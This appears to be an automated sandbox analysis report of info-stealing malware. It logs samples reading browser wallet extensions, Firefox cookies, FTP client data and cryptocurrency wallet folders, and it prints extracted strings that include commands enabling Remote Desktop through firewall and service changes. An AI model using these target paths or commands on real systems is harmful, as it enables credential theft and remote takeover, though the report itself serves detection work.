Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_81
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_XP
                                      Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_XPe
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_VISTA
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_7
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_8
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: Yara matchFile source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000010.00000003.1467013696.0000000001337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: UD49QH6.exe PID: 6024, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                                      Remote Access Functionality

                                      Source: Yara matchFile source: Process Memory Space: UD49QH6.exe PID: 6024, type: MEMORYSTR
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 49.2.cronikxqqq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 49.2.cronikxqqq.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000031.00000002.1772447973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 17.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518189012.000000000043C000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000000.1442265227.000000000043C000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000006.00000003.5645957689.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe, type: DROPPED
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 48.0.cronikxqqq.exe.870000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000030.00000000.1635997111.0000000000872000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe, type: DROPPED
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Source: M6gQuZPvgY.exeString found in binary or memory: net start termservice
                                      Source: M6gQuZPvgY.exe, 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                                      Source: M6gQuZPvgY.exe, 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: rapes.exeString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000002.00000002.1039110891.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: net start termservice
